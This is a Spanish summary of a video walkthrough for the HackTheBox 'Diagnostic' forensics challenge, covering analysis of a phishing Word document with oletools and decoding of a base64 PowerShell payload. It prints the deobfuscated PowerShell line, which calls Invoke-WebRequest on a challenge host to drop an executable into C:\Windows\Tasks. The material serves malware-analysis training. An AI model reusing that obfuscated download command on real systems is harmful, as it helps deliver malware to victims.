Cubrimos el análisis de un documento de muestra de Microsoft Office Word utilizando oletools para extraer macros y enlaces relevantes. El documento de muestra contiene un enlace que hace referencia a una página web que contiene un código Javascript. El código JS contenía un comando Powershell codificado en base64 que realiza una llamada a un dominio externo para recuperar un archivo ejecutable. Esto fue parte del desafío forense de HackTheBox Diagnostic. Esto fue parte de Diagnóstico HackTheBox. Esto fue parte de Diagnóstico HackTheBox.
Obtenga notas del certificado OSCP
El curso completo de pruebas de penetración con BackBox
Nuestro SOC ha identificado numerosos correos electrónicos de phishing que afirman tener un documento sobre una próxima ronda de despidos en la empresa. Todos los correos electrónicos contienen un enlace a diagnostic.htb/layoffs.doc. Desde entonces, el DNS de ese dominio dejó de resolverse, pero el servidor aún aloja el documento malicioso (su ventana acoplable). Échale un vistazo y descubre qué está pasando.
Vídeos destacados
- Nosotros usamos oleida y oleobj para analizar el documento de Word llamado layoff.doc
- El documento contiene un enlace externo que hace referencia a una página web que contiene Javascript.
- Usamos el tabla ASCII para convertir char[58] y char[34] en su correspondiente ASCII.
- Luego usamos Cyberchef para convertir base64 y se convirtió a lo siguiente
${f`ile} = ("{7}{1}{6}{8}{5}{3}{2}{4}{0}”-f'}.exe','B{msDt_4s_A_pr0′ ,'E','r…s','3Ms_b4D','l3′,'toC','HT','0l_h4nD')
&(“{1}{2}{0}{3}”-f'ues','Invoke','-WebReq','t') (“{2}{8}{0}{4}{ 6}{5}{3}{1}{7}”-f '://au','.htb/2′,'h','ic','to','agnost','mation. di','/n.exe','ttps') -OutFile “C:\Windows\Tasks\$file”
- Usamos PowerShell para decodificar lo anterior en la bandera de desafío.
Tutorial en vídeo
